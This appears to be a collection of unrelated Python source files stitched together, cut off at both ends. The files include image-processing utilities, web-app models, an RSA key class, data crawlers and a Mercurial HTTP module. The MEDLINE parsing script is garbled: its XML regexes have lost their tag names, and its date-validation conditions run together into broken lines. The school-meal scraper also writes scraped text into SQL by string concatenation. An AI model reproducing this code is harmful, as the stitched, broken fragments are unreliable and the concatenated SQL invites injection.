glfw.MOUSE_BUTTON_MIDDLE: MouseButton.Middle, glfw.MOUSE_BUTTON_RIGHT: MouseButton.Right } # Copyright (c) Open-MMLab. All rights reserved. import cv2 import numpy as np def _scale_size(size, scale): """Rescale a size by a ratio. Args: size (tuple[int]): (w, h). scale (float): Scaling factor. Returns: tuple[int]: scaled size. """ w, h = size return int(w * float(scale) + 0.5), int(h * float(scale) + 0.5) interp_codes = { 'nearest': cv2.INTER_NEAREST, 'bilinear': cv2.INTER_LINEAR, 'bicubic': cv2.INTER_CUBIC, 'area': cv2.INTER_AREA, 'lanczos': cv2.INTER_LANCZOS4 } def imresize(img, size, return_scale=False, interpolation='bilinear', out=None): """Resize image to a given size. Args: img (ndarray): The input image. size (tuple[int]): Target size (w, h). return_scale (bool): Whether to return `w_scale` and `h_scale`. interpolation (str): Interpolation method, accepted values are "nearest", "bilinear", "bicubic", "area", "lanczos". out (ndarray): The output destination. Returns: tuple | ndarray: (`resized_img`, `w_scale`, `h_scale`) or `resized_img`. """ h, w = img.shape[:2] resized_img = cv2.resize( img, size, dst=out, interpolation=interp_codes[interpolation]) if not return_scale: return resized_img else: w_scale = size[0] / w h_scale = size[1] / h return resized_img, w_scale, h_scale def imresize_like(img, dst_img, return_scale=False, interpolation='bilinear'): """Resize image to the same size of a given image. Args: img (ndarray): The input image. dst_img (ndarray): The target image. return_scale (bool): Whether to return `w_scale` and `h_scale`. interpolation (str): Same as :func:`resize`. Returns: tuple or ndarray: (`resized_img`, `w_scale`, `h_scale`) or `resized_img`. """ h, w = dst_img.shape[:2] return imresize(img, (w, h), return_scale, interpolation) def rescale_size(old_size, scale, return_scale=False): """Calculate the new size to be rescaled to. Args: old_size (tuple[int]): The old size (w, h) of image. scale (float | tuple[int]): The scaling factor or maximum size. If it is a float number, then the image will be rescaled by this factor, else if it is a tuple of 2 integers, then the image will be rescaled as large as possible within the scale. return_scale (bool): Whether to return the scaling factor besides the rescaled image size. Returns: tuple[int]: The new rescaled image size. """ w, h = old_size if isinstance(scale, (float, int)): if scale <= 0: raise ValueError(f'Invalid scale {scale}, must be positive.') scale_factor = scale elif isinstance(scale, tuple): max_long_edge = max(scale) max_short_edge = min(scale) scale_factor = min(max_long_edge / max(h, w), max_short_edge / min(h, w)) else: raise TypeError( f'Scale must be a number or tuple of int, but got {type(scale)}') new_size = _scale_size((w, h), scale_factor) if return_scale: return new_size, scale_factor else: return new_size def imrescale(img, scale, return_scale=False, interpolation='bilinear'): """Resize image while keeping the aspect ratio. Args: img (ndarray): The input image. scale (float | tuple[int]): The scaling factor or maximum size. If it is a float number, then the image will be rescaled by this factor, else if it is a tuple of 2 integers, then the image will be rescaled as large as possible within the scale. return_scale (bool): Whether to return the scaling factor besides the rescaled image. interpolation (str): Same as :func:`resize`. Returns: ndarray: The rescaled image. """ h, w = img.shape[:2] new_size, scale_factor = rescale_size((w, h), scale, return_scale=True) rescaled_img = imresize(img, new_size, interpolation=interpolation) if return_scale: return rescaled_img, scale_factor else: return rescaled_img def imflip(img, direction='horizontal'): """Flip an image horizontally or vertically. Args: img (ndarray): Image to be flipped. direction (str): The flip direction, either "horizontal" or "vertical". Returns: ndarray: The flipped image. """ assert direction in ['horizontal', 'vertical'] if direction == 'horizontal': return np.flip(img, axis=1) else: return np.flip(img, axis=0) def imflip_(img, direction='horizontal'): """Inplace flip an image horizontally or vertically. Args: img (ndarray): Image to be flipped. direction (str): The flip direction, either "horizontal" or "vertical". Returns: ndarray: The flipped image (inplace). """ assert direction in ['horizontal', 'vertical'] if direction == 'horizontal': return cv2.flip(img, 1, img) else: return cv2.flip(img, 0, img) def imrotate(img, angle, center=None, scale=1.0, border_value=0, auto_bound=False): """Rotate an image. Args: img (ndarray): Image to be rotated. angle (float): Rotation angle in degrees, positive values mean clockwise rotation. center (tuple[float], optional): Center point (w, h) of the rotation in the source image. If not specified, the center of the image will be used. scale (float): Isotropic scale factor. border_value (int): Border value. auto_bound (bool): Whether to adjust the image size to cover the whole rotated image. Returns: ndarray: The rotated image. """ if center is not None and auto_bound: raise ValueError('`auto_bound` conflicts with `center`') h, w = img.shape[:2] if center is None: center = ((w - 1) * 0.5, (h - 1) * 0.5) assert isinstance(center, tuple) matrix = cv2.getRotationMatrix2D(center, -angle, scale) if auto_bound: cos = np.abs(matrix[0, 0]) sin = np.abs(matrix[0, 1]) new_w = h * sin + w * cos new_h = h * cos + w * sin matrix[0, 2] += (new_w - w) * 0.5 matrix[1, 2] += (new_h - h) * 0.5 w = int(np.round(new_w)) h = int(np.round(new_h)) rotated = cv2.warpAffine(img, matrix, (w, h), borderValue=border_value) return rotated def bbox_clip(bboxes, img_shape): """Clip bboxes to fit the image shape. Args: bboxes (ndarray): Shape (..., 4*k) img_shape (tuple[int]): (height, width) of the image. Returns: ndarray: Clipped bboxes. """ assert bboxes.shape[-1] % 4 == 0 cmin = np.empty(bboxes.shape[-1], dtype=bboxes.dtype) cmin[0::2] = img_shape[1] - 1 cmin[1::2] = img_shape[0] - 1 clipped_bboxes = np.maximum(np.minimum(bboxes, cmin), 0) return clipped_bboxes def bbox_scaling(bboxes, scale, clip_shape=None): """Scaling bboxes w.r.t the box center. Args: bboxes (ndarray): Shape(..., 4). scale (float): Scaling factor. clip_shape (tuple[int], optional): If specified, bboxes that exceed the boundary will be clipped according to the given shape (h, w). Returns: ndarray: Scaled bboxes. """ if float(scale) == 1.0: scaled_bboxes = bboxes.copy() else: w = bboxes[..., 2] - bboxes[..., 0] + 1 h = bboxes[..., 3] - bboxes[..., 1] + 1 dw = (w * (scale - 1)) * 0.5 dh = (h * (scale - 1)) * 0.5 scaled_bboxes = bboxes + np.stack((-dw, -dh, dw, dh), axis=-1) if clip_shape is not None: return bbox_clip(scaled_bboxes, clip_shape) else: return scaled_bboxes def imcrop(img, bboxes, scale=1.0, pad_fill=None): """Crop image patches. 3 steps: scale the bboxes -> clip bboxes -> crop and pad. Args: img (ndarray): Image to be cropped. bboxes (ndarray): Shape (k, 4) or (4, ), location of cropped bboxes. scale (float, optional): Scale ratio of bboxes, the default value 1.0 means no padding. pad_fill (Number | list[Number]): Value to be filled for padding. Default: None, which means no padding. Returns: list[ndarray] | ndarray: The cropped image patches. """ chn = 1 if img.ndim == 2 else img.shape[2] if pad_fill is not None: if isinstance(pad_fill, (int, float)): pad_fill = [pad_fill for _ in range(chn)] assert len(pad_fill) == chn _bboxes = bboxes[None, ...] if bboxes.ndim == 1 else bboxes scaled_bboxes = bbox_scaling(_bboxes, scale).astype(np.int32) clipped_bbox = bbox_clip(scaled_bboxes, img.shape) patches = [] for i in range(clipped_bbox.shape[0]): x1, y1, x2, y2 = tuple(clipped_bbox[i, :]) if pad_fill is None: patch = img[y1:y2 + 1, x1:x2 + 1, ...] else: _x1, _y1, _x2, _y2 = tuple(scaled_bboxes[i, :]) if chn == 1: patch_shape = (_y2 - _y1 + 1, _x2 - _x1 + 1) else: patch_shape = (_y2 - _y1 + 1, _x2 - _x1 + 1, chn) patch = np.array( pad_fill, dtype=img.dtype) * np.ones( patch_shape, dtype=img.dtype) x_start = 0 if _x1 >= 0 else -_x1 y_start = 0 if _y1 >= 0 else -_y1 w = x2 - x1 + 1 h = y2 - y1 + 1 patch[y_start:y_start + h, x_start:x_start + w, ...] = img[y1:y1 + h, x1:x1 + w, ...] patches.append(patch) if bboxes.ndim == 1: return patches[0] else: return patches def impad(img, shape, pad_val=0): """Pad an image to a certain shape. Args: img (ndarray): Image to be padded. shape (tuple[int]): Expected padding shape (h, w). pad_val (Number | Sequence[Number]): Values to be filled in padding areas. Default: 0. Returns: ndarray: The padded image. """ if not isinstance(pad_val, (int, float)): assert len(pad_val) == img.shape[-1] if len(shape) < len(img.shape): shape = shape + (img.shape[-1], ) assert len(shape) == len(img.shape) for i in range(len(shape)): assert shape[i] >= img.shape[i] pad = np.empty(shape, dtype=img.dtype) pad[...] = pad_val pad[:img.shape[0], :img.shape[1], ...] = img return pad def impad_to_multiple(img, divisor, pad_val=0): """Pad an image to ensure each edge to be multiple to some number. Args: img (ndarray): Image to be padded. divisor (int): Padded image edges will be multiple to divisor. pad_val (Number | Sequence[Number]): Same as :func:`impad`. Returns: ndarray: The padded image. """ pad_h = int(np.ceil(img.shape[0] / divisor)) * divisor pad_w = int(np.ceil(img.shape[1] / divisor)) * divisor return impad(img, (pad_h, pad_w), pad_val) from kiwoom import * from pandas import DataFrame kiwoom = Kiwoom() kiwoom.CommConnect() kospi = kiwoom.GetCodeListByMarket('0') kosdaq = kiwoom.GetCodeListByMarket('10') total = kospi + kosdaq rows = [] for code in total: name = kiwoom.GetMasterCodeName(code) rows.append((code, name)) columns = ['code', 'name'] df = DataFrame(data=rows, columns=columns) df = df.set_index('code') df.to_excel("code.xlsx") import werkzeug.security from flask_login import current_user from depc.controllers import Controller, AlreadyExistError from depc.extensions import db from depc.models.users import User class UserController(Controller): model_cls = User @classmethod def get_current_user(cls): user = current_user.to_dict() user["grants"] = {} for grant in current_user.grants: user["grants"][grant.team.name] = grant.role.name return user @classmethod def before_data_load(cls, data): if "password" in data: data["password"] = werkzeug.security.generate_password_hash( data["password"] ) @classmethod def handle_integrity_error(cls, obj, error): db.session.rollback() if User.query.filter_by(username=obj.username).all(): raise AlreadyExistError( "The user {username} already exists.", {"username": obj.username} ) # Please don't import anything from lass., to avoid circular dependencies import sqlalchemy.ext.declarative import sqlalchemy.orm import zope.sqlalchemy DBSession = sqlalchemy.orm.scoped_session( sqlalchemy.orm.sessionmaker( extension=zope.sqlalchemy.ZopeTransactionExtension() ) ) Base = sqlalchemy.ext.declarative.declarative_base() class PublicModel(Base): """Base class for models in the public schema.""" __abstract__ = True __table_args__ = {'schema': 'public'} # A script to check layer by layer activation differences between the Caffe2 and Pytorch models. import numpy as np import pickle import torch import argparse parser = argparse.ArgumentParser() parser.add_argument('--model', default='r50_nl', help='r50|r50_nl') args = parser.parse_args() #-----------------------------------------------------------------------------------------------# # Generate a random input. Normalize for fun. np.random.seed(123) data = np.random.rand(4, 3, 32, 224, 224).astype(np.float32)*255 data = (data-114.75)/57.375 #-----------------------------------------------------------------------------------------------# from caffe2.python import workspace from models import model_builder_video, resnet_video_org workspace.GlobalInit(['caffe2', '--caffe2_log_level=0']) workspace.ResetWorkspace() c2_net = model_builder_video.ModelBuilder( name='test', train=False, use_cudnn=False, cudnn_exhaustive_search=False, split='val') c2_net.net.Proto().type = 'dag' workspace.CreateBlob('data') workspace.CreateBlob('labels') c2_net, out_blob = resnet_video_org.create_model(model=c2_net, data='data', labels='labels', split='val', use_nl=args.model=='r50_nl') workspace.RunNetOnce(c2_net.param_init_net) workspace.CreateNet(c2_net.net) # load pretrained weights if args.model=='r50': wt_file = 'pretrained/i3d_baseline_32x2_IN_pretrain_400k.pkl' elif args.model=='r50_nl': wt_file = 'pretrained/i3d_nonlocal_32x2_IN_pretrain_400k.pkl' wts = pickle.load(open(wt_file, 'rb'), encoding='latin')['blobs'] for key in wts: if type(wts[key]) == np.ndarray: workspace.FeedBlob(key, wts[key]) workspace.FeedBlob('data', data) workspace.RunNet(c2_net.net.Proto().name) c2_blobs = {key: workspace.FetchBlob(key) for key in workspace.Blobs()} #-----------------------------------------------------------------------------------------------# torch.backends.cudnn.enabled = False from models import resnet data = torch.from_numpy(data).cuda() # load pretrained weights if args.model=='r50': pth_net = resnet.i3_res50(num_classes=400) key_map = torch.load('pretrained/i3d_r50_kinetics.pth.keymap') elif args.model=='r50_nl': pth_net = resnet.i3_res50_nl(num_classes=400) key_map = torch.load('pretrained/i3d_r50_nl_kinetics.pth.keymap') key_map = {'.'.join(k.split('.')[:-1]): '_'.join(v.split('_')[:-1]) for k, v in key_map.items()} pth_net.cuda().eval() def hook(module, input, output): setattr(module, "_value_hook", output) for name, module in pth_net.named_modules(): module.register_forward_hook(hook) pth_net({'frames':data}) pth_blobs = {} for name, module in pth_net.named_modules(): try: if len(name)>0: activation = module._value_hook.cpu().detach().numpy() pth_blobs[name] = activation except: pass for key in sorted(key_map): pth_v = pth_blobs[key] c2_v = c2_blobs[key_map[key]] # For each activation value, print the max/min/mean abs difference # Most of these are <1e-6 delta = np.abs(pth_v-c2_v) print (key, np.max(delta), np.min(delta), np.mean(delta))import numpy as np from os import listdir from glob import glob from time import time import cv2 import matplotlib.pyplot as plt def dataSetGenerator(path,resize=False,resize_to=224,percentage=100): """ DataSetsFolder | |----------class-1 | . |-------image-1 | . | . | . | . | . | . | . |-------image-n | . |-------class-n :param path: /DataSetsFolder :param resize: :param resize_to: :param percentage: :return: images, labels, classes """ start_time = time() classes = listdir(path) image_list = [] labels = [] for classe in classes: for filename in glob(path+'/'+classe+'/*.tif'): if resize:image_list.append(cv2.resize(cv2.imread(filename),(resize_to, resize_to))) else:image_list.append(cv2.imread(filename)) label=np.zeros(len(classes)) label[classes.index(classe)]=1 labels.append(label) indice = np.random.permutation(len(image_list))[:int(len(image_list)*percentage/100)] print("\n --- dataSet generated in %s seconds --- \n" % (np.round(time()-start_time))) return np.array([image_list[x] for x in indice]),np.array([labels[x] for x in indice]),np.array(classes) if __name__ == '__main__': # for testing the generator path = "C:/Users/shous/Desktop/UCMerced_LandUse/Images/" data,labels,classes = dataSetGenerator(path,percentage=80) print("\n dataSet classes :\n",*classes) print("\n data shape : ",data.shape) print("\n label shape :",labels[100]) plt.imshow(data[100]) plt.show() # -*- coding: utf-8 -*- # Exercícios by (CodingBat) # I. sem_pontas # seja uma string s de pelo menos dois caracteres # retorna uma string sem o primeiro e último caracter # sem_pontas('Hello') -> 'ell' # sem_pontas('python') -> 'ytho' # sem_pontas('coding') -> 'odin' def sem_pontas(s): return s[1:-1] def test_ex09(): print ('Sem Pontas') assert sem_pontas('Hello') == 'ell' assert sem_pontas('Python') == 'ytho' assert sem_pontas('coding') == 'odin' assert sem_pontas('code') == 'od' assert sem_pontas('ab') == '' assert sem_pontas('Chocolate!') == 'hocolate' assert sem_pontas('kitten') == 'itte' assert sem_pontas('woohoo') == 'ooho' from django.db import models class Game(models.Model): game_name = models.CharField(max_length=10) description = models.CharField(max_length=100) def __str__(self): return str(self.pk) + ":"+ self.game_name # Create your models here. class Player(models.Model): game = models.ForeignKey(Game, on_delete=models.CASCADE, default=None) first_name = models.CharField(max_length=100, null=False, blank=False) last_name = models.CharField(max_length=100, null=False, blank=False) photo_name = models.CharField(max_length=100, null=True, blank=True) position = models.IntegerField(default=0, null=False, blank=True) def __str__(self): return str(self.pk) + ":" +self.first_name + ' ' + self.last_name + " pos="+str(self.position) class Gift(models.Model): game = models.ForeignKey(Game, on_delete=models.CASCADE,default=None) original_owner = models.ForeignKey(Player, on_delete=models.CASCADE, null=False, blank=False, related_name='original_owner') current_owner = models.ForeignKey(Player, on_delete=models.CASCADE, null=True, blank=True, related_name='current_owner') file_name = models.CharField(max_length=100) locked = models.BooleanField(default=False, null=False, blank=False) number_of_times_stolen = models.IntegerField(default=0, null=False, blank=False) wrap = models.CharField(max_length=15, default=None, blank=True, null=True) def __str__(self): res = str(self.pk) + ":"+ self.file_name+" Current Owner=" if self.current_owner is None: res = res + "None" else: res = res+self.current_owner.first_name return res class GameProperties(models.Model): game = models.OneToOneField(Game, on_delete=models.CASCADE,default=None) current_player = models.ForeignKey(Player, null=True, blank=True, on_delete=models.CASCADE) next_position = models.IntegerField(default=0, null=False, blank=False) #this is next position on gift open no_lock_stage = models.BooleanField(default=False, null=False, blank=False) started = models.BooleanField(default=False, null=False, blank=False) ended = models.BooleanField(default=False, null=False, blank=False) def __str__(self): return str(self.pk) + ":"+ self.game.game_name # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import, division, print_function import six from cryptography import utils from cryptography.exceptions import UnsupportedAlgorithm, _Reasons from cryptography.hazmat.backends.interfaces import RSABackend from cryptography.hazmat.primitives import interfaces @utils.register_interface(interfaces.RSAPublicKey) class RSAPublicKey(object): def __init__(self, public_exponent, modulus): if ( not isinstance(public_exponent, six.integer_types) or not isinstance(modulus, six.integer_types) ): raise TypeError("RSAPublicKey arguments must be integers") if modulus < 3: raise ValueError("modulus must be >= 3") if public_exponent < 3 or public_exponent >= modulus: raise ValueError("public_exponent must be >= 3 and < modulus") if public_exponent & 1 == 0: raise ValueError("public_exponent must be odd") self._public_exponent = public_exponent self._modulus = modulus def verifier(self, signature, padding, algorithm, backend): if not isinstance(backend, RSABackend): raise UnsupportedAlgorithm( "Backend object does not implement RSABackend", _Reasons.BACKEND_MISSING_INTERFACE ) return backend.create_rsa_verification_ctx(self, signature, padding, algorithm) def encrypt(self, plaintext, padding, backend): if not isinstance(backend, RSABackend): raise UnsupportedAlgorithm( "Backend object does not implement RSABackend", _Reasons.BACKEND_MISSING_INTERFACE ) return backend.encrypt_rsa(self, plaintext, padding) @property def key_size(self): return utils.bit_length(self.modulus) @property def public_exponent(self): return self._public_exponent @property def modulus(self): return self._modulus @property def e(self): return self.public_exponent @property def n(self): return self.modulus def _modinv(e, m): """ Modular Multiplicative Inverse. Returns x such that: (x*e) mod m == 1 """ x1, y1, x2, y2 = 1, 0, 0, 1 a, b = e, m while b > 0: q, r = divmod(a, b) xn, yn = x1 - q * x2, y1 - q * y2 a, b, x1, y1, x2, y2 = b, r, x2, y2, xn, yn return x1 % m def rsa_crt_iqmp(p, q): """ Compute the CRT (q ** -1) % p value from RSA primes p and q. """ return _modinv(q, p) def rsa_crt_dmp1(private_exponent, p): """ Compute the CRT private_exponent % (p - 1) value from the RSA private_exponent and p. """ return private_exponent % (p - 1) def rsa_crt_dmq1(private_exponent, q): """ Compute the CRT private_exponent % (q - 1) value from the RSA private_exponent and q. """ return private_exponent % (q - 1) @utils.register_interface(interfaces.RSAPrivateKey) class RSAPrivateKey(object): def __init__(self, p, q, private_exponent, dmp1, dmq1, iqmp, public_exponent, modulus): if ( not isinstance(p, six.integer_types) or not isinstance(q, six.integer_types) or not isinstance(dmp1, six.integer_types) or not isinstance(dmq1, six.integer_types) or not isinstance(iqmp, six.integer_types) or not isinstance(private_exponent, six.integer_types) or not isinstance(public_exponent, six.integer_types) or not isinstance(modulus, six.integer_types) ): raise TypeError("RSAPrivateKey arguments must be integers") if modulus < 3: raise ValueError("modulus must be >= 3") if p >= modulus: raise ValueError("p must be < modulus") if q >= modulus: raise ValueError("q must be < modulus") if dmp1 >= modulus: raise ValueError("dmp1 must be < modulus") if dmq1 >= modulus: raise ValueError("dmq1 must be < modulus") if iqmp >= modulus: raise ValueError("iqmp must be < modulus") if private_exponent >= modulus: raise ValueError("private_exponent must be < modulus") if public_exponent < 3 or public_exponent >= modulus: raise ValueError("public_exponent must be >= 3 and < modulus") if public_exponent & 1 == 0: raise ValueError("public_exponent must be odd") if dmp1 & 1 == 0: raise ValueError("dmp1 must be odd") if dmq1 & 1 == 0: raise ValueError("dmq1 must be odd") if p * q != modulus: raise ValueError("p*q must equal modulus") self._p = p self._q = q self._dmp1 = dmp1 self._dmq1 = dmq1 self._iqmp = iqmp self._private_exponent = private_exponent self._public_exponent = public_exponent self._modulus = modulus @classmethod def generate(cls, public_exponent, key_size, backend): if not isinstance(backend, RSABackend): raise UnsupportedAlgorithm( "Backend object does not implement RSABackend", _Reasons.BACKEND_MISSING_INTERFACE ) return backend.generate_rsa_private_key(public_exponent, key_size) def signer(self, padding, algorithm, backend): if not isinstance(backend, RSABackend): raise UnsupportedAlgorithm( "Backend object does not implement RSABackend", _Reasons.BACKEND_MISSING_INTERFACE ) return backend.create_rsa_signature_ctx(self, padding, algorithm) def decrypt(self, ciphertext, padding, backend): if not isinstance(backend, RSABackend): raise UnsupportedAlgorithm( "Backend object does not implement RSABackend", _Reasons.BACKEND_MISSING_INTERFACE ) return backend.decrypt_rsa(self, ciphertext, padding) @property def key_size(self): return utils.bit_length(self.modulus) def public_key(self): return RSAPublicKey(self.public_exponent, self.modulus) @property def p(self): return self._p @property def q(self): return self._q @property def private_exponent(self): return self._private_exponent @property def public_exponent(self): return self._public_exponent @property def modulus(self): return self._modulus @property def d(self): return self.private_exponent @property def dmp1(self): return self._dmp1 @property def dmq1(self): return self._dmq1 @property def iqmp(self): return self._iqmp @property def e(self): return self.public_exponent @property def n(self): return self.modulus import logging from graphql import GraphQLError from neomodel import NeomodelException from kaffepause.accounts.exceptions import AccountCreationFailed from kaffepause.accounts.models import Account from kaffepause.location.selectors import get_location from kaffepause.users.forms import UserCreationForm logger = logging.getLogger(__name__) def validate_user(**kwargs): """Prepare the user object for creation and account connection.""" form = UserCreationForm(kwargs) if form.is_valid(): return form.save(commit=False) raise GraphQLError(form.errors.get_json_data()) def create_user(user, preferred_location_uuid=None, **kwargs): connect_user_and_account(user, **kwargs) if preferred_location_uuid: connect_preferred_location(preferred_location_uuid, user) return user def connect_preferred_location(preferred_location_uuid, user): preferred_location = get_location(location_uuid=preferred_location_uuid) user.preferred_location.connect(preferred_location) def connect_user_and_account(user, **kwargs): email = kwargs.get(Account.EMAIL_FIELD) account = Account.objects.get(email=email) user.uuid = account.id try_to_create_user(account, user) def try_to_create_user(account, user): """Try to save the user and delete the account upon failure.""" try: user.save() except NeomodelException: logger.exception( f"Failed to create user node, deleting account (id:{account.id})", ) account.delete() raise AccountCreationFailed logger.debug( f"Successfully created new account and user node (id/uuid:{account.id})" ) #!/usr/bin/python3 # this script parses titles and abstracts from the MEDLINE baseline import gzip import os import re months_list = {'Jan': 1, 'Feb': 2, 'Mar': 3, 'Apr': 4, 'May': 5, 'Jun': 6, 'Jul': 7, 'Aug': 8, 'Sep': 9, 'Oct': 10, 'Nov': 11, 'Dec': 12, 'Summer': 6, 'Winter': 12, 'Fall': 9, 'Spring': 3, 'January': 1, 'February': 2, 'March': 3, 'April': 4, 'May': 5, 'June': 6, 'July': 7, 'August': 8, 'September': 9, 'October': 10, 'November': 11, 'December': 12, } source_directories = ['/pstore/data/i2e/i2e_sources/Source_Data/MEDLINE_download/2020/Base/'] output_file = "pmid_date.txt" f_out = open(output_file, "w", encoding = "utf-8") months_list_keys = sorted(months_list, key=months_list.get) mesh_heading_area = 0 descriptor_names = [] found = 0 pmid = "0" abstract = "" title = "" year = "" month = "" day = "" pubdate_zone = 0 for source_directory in source_directories: print(source_directory) files = os.listdir(source_directory) # go through every file in MEDLINE for file in files: input_file = os.path.join(source_directory, file) if re.search("\.gz", input_file): print(input_file) f = gzip.open(input_file, "rt", encoding = "utf-8") for line in f: line = line[:-1] # take the first PMID as the PMID of the record if pmid == "0": if re.search("(.+)<\/PMID>", line): matched = re.search("(.+)<\/PMID>", line) pmid = matched.group(1) # read publication date if re.search("(.+)<\/Year>", line): matched = re.search("(.+)<\/Year>", line) year = matched.group(1) if re.search("(.+)<\/Month>", line): matched = re.search("(.+)<\/Month>", line) month = matched.group(1) if month in months_list_keys: month_index = months_list[month] month = str(month_index) if re.search("(.+)<\/Day>", line): matched = re.search("(.+)<\/Day>", line) day = matched.group(1) if re.search("(.+)<\/MedlineDate>", line): matched = re.search("(.+)<\/MedlineDate>", line) medlinedate = matched.group(1) for month_name in months_list_keys: if month == "": if month_name in medlinedate: month_index = months_list[month_name] month = str(month_index) print("==" + month + "--") if re.search("[1-2][0-9][0-9][0-9]", medlinedate): matched = re.search("([1-2][0-9][0-9][0-9])", medlinedate) year = matched.group(1) # when the record ends write the output if re.search(" 12: if int(day) < 1 or int(day) > 31: if int(year) < 1000 or int(year) > 2030: f_out.write(pmid + "\t" + date + "\n") pmid = "0" abstract = "" title = "" year = "" month = "" day = "" Tools/crawl-tweets/CrawlTweetsByHashtag.py import tweepy from DataHelper import get_crawled_tweets_id_list, clear_crawled_tweets_id_list, put_crawled_tweets_id_list, init_saved_tweets_file, added_to_csv_files from DataHelper import add_log, set_api from DataHelper import search_tweets_by_phrase import time def crawl_political(oauth_api, if_clear=False): BASE_PATH = "../develop/political" SAVE_FILE_NAME, LOG_FILE_NAME = init_saved_tweets_file(BASE_PATH) if if_clear: clear_crawled_tweets_id_list(BASE_PATH) search_since_date = None key_phrase_list = ['Trump', 'Biden', 'Sanders', 'Harris', 'Warren'] for key_phrase in key_phrase_list: add_log(LOG_FILE_NAME, "Searching tweets with key_phrase: (%s)" % key_phrase) search_tweets_by_phrase(oauth_api, key_phrase, SAVE_FILE_NAME, BASE_PATH, search_since_date) return if __name__ == '__main__': oauth_api = set_api(proxyUrl="http://127.0.0.1:7078") crawl_political(oauth_api, if_clear=False) jyh69293/index1 import urllib.request import sqlite3 from bs4 import BeautifulSoup # 타학교에서 이용시 수정 regioncode = 'cbe.go.kr' schulcode = 'M100002171' # Tuple day = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat'] meal = ['', '', '', '', '', '', '일요일은 급식이 제공되지 않습니다.'] ######### # Crawl # ######### sccode = 1 while sccode < 4: # NEIS에서 급식 파싱 url = ('http://stu.' + regioncode + '/sts_sci_md01_001.do?schulCode=' + schulcode + '&schulCrseScCode=4&schulKndScCode=04&schMmealScCode=' + str(sccode)) try: source = urllib.request.urlopen(url, timeout=3) except Exception as e: print(e) menu = ('급식 정보를 가져오는 중 문제가 발생하였습니다.\n관리자에게 연락바랍니다.') else: # beautifulsoup4를 이용해 utf-8, lxml으로 파싱 soup = BeautifulSoup(source, "lxml", from_encoding='utf-8') # div_id="contents"안의 table을 모두 검색 후 td태그만 추출 table_div = soup.find(id="contents") tables = table_div.find_all("table") menu_table = tables[0] td = menu_table.find_all('td') today = 0 while today < 6: # 월요일 ~ 토요일 = td[8] ~ td[13] menu = td[today + 8] # 파싱 후 불필요한 태그 잔해물 제거 menu = str(menu).replace('*', '').replace('', "").replace('', '').replace('class="textC last">', '').replace('class="textC">','').replace('
    ', '\n').replace('1.', '').replace('2.', '').replace('3.', '').replace('4.', '').replace('5.', '').replace('6.','').replace('7.', '').replace('8.', '').replace('9.', '').replace('10.', '').replace('11.', '').replace('12.', '').replace('13.', '').replace('14.', '').replace('15.', '').replace('1', '').replace(' ', '') if menu == '': menu = '급식 정보가 존재하지 않습니다.\n급식이 없는 날일 수 있으니 확인 바랍니다.' if today != 6: if sccode == 1: meal[today] = "[조식]\n" + menu elif sccode == 2: meal[today] = meal[today] + "\n\n[중식]\n" + menu elif sccode == 3: meal[today] = meal[today] + "\n\n[석식]\n" + menu today = today + 1 sccode = sccode + 1 ####### # SQL # ####### con = sqlite3.connect("meal.db") cur = con.cursor() check = ("SELECT * FROM meal") cur.execute(check) data = cur.fetchone() if data is None: insert = ("INSERT into meal('mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun') VALUES (?, ?, ?, ?, ?, ?, ?)") cur.execute(insert, meal) else: for i in day: update = ("UPDATE meal SET " + i + " = '" + meal[(day.index(i))] + "' WHERE no = 1") cur.execute(update) con.commit() con.close() # httppeer.py - HTTP repository proxy classes for mercurial # # Copyright 2005, 2006 <> # Copyright 2006 <> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. from __future__ import absolute_import import errno import io import os import socket import struct import weakref from .i18n import _ from . import ( bundle2, error, httpconnection, pycompat, repository, statichttprepo, url as urlmod, util, wireprotoframing, wireprototypes, wireprotov1peer, wireprotov2peer, wireprotov2server, ) from .utils import ( cborutil, interfaceutil, stringutil, ) httplib = util.httplib urlerr = util.urlerr urlreq = util.urlreq def encodevalueinheaders(value, header, limit): """Encode a string value into multiple HTTP headers. ``value`` will be encoded into 1 or more HTTP headers with the names ``header-`` where ```` is an integer starting at 1. Each header name + value will be at most ``limit`` bytes long. Returns an iterable of 2-tuples consisting of header names and values as native strings. """ # HTTP Headers are ASCII. Python 3 requires them to be unicodes, # not bytes. This function always takes bytes in as arguments. fmt = pycompat.strurl(header) + r'-%s' # Note: it is *NOT* a bug that the last bit here is a bytestring # and not a unicode: we're just getting the encoded length anyway, # and using an r-string to make it portable between Python 2 and 3 # doesn't work because then the \r is a literal backslash-r # instead of a carriage return. valuelen = limit - len(fmt % r'000') - len(': \r\n') result = [] n = 0 for i in pycompat.xrange(0, len(value), valuelen): n += 1 result.append((fmt % str(n), pycompat.strurl(value[i:i + valuelen]))) return result class _multifile(object): def __init__(self, *fileobjs): for f in fileobjs: if not util.safehasattr(f, 'length'): raise ValueError( '_multifile only supports file objects that ' 'have a length but this one does not:', type(f), f) self._fileobjs = fileobjs self._index = 0 @property def length(self): return sum(f.length for f in self._fileobjs) def read(self, amt=None): if amt <= 0: return ''.join(f.read() for f in self._fileobjs) parts = [] while amt and self._index < len(self._fileobjs): parts.append(self._fileobjs[self._index].read(amt)) got = len(parts[-1]) if got < amt: self._index += 1 amt -= got return ''.join(parts) def seek(self, offset, whence=os.SEEK_SET): if whence != os.SEEK_SET: raise NotImplementedError( '_multifile does not support anything other' ' than os.SEEK_SET for whence on seek()') if offset != 0: raise NotImplementedError( '_multifile only supports seeking to start, but that ' 'could be fixed if you need it') for f in self._fileobjs: f.seek(0) self._index = 0 def makev1commandrequest(ui, requestbuilder, caps, capablefn, repobaseurl, cmd, args): """Make an HTTP request to run a command for a version 1 client. ``caps`` is a set of known server capabilities. The value may be None if capabilities are not yet known. ``capablefn`` is a function to evaluate a capability. ``cmd``, ``args``, and ``data`` define the command, its arguments, and raw data to pass to it. """ if cmd == 'pushkey': args['data'] = '' data = args.pop('data', None) headers = args.pop('headers', {}) ui.debug("sending %s command\n" % cmd) q = [('cmd', cmd)] headersize = 0 # Important: don't use self.capable() here or else you end up # with infinite recursion when trying to look up capabilities # for the first time. postargsok = caps is not None and 'httppostargs' in caps # Send arguments via POST. 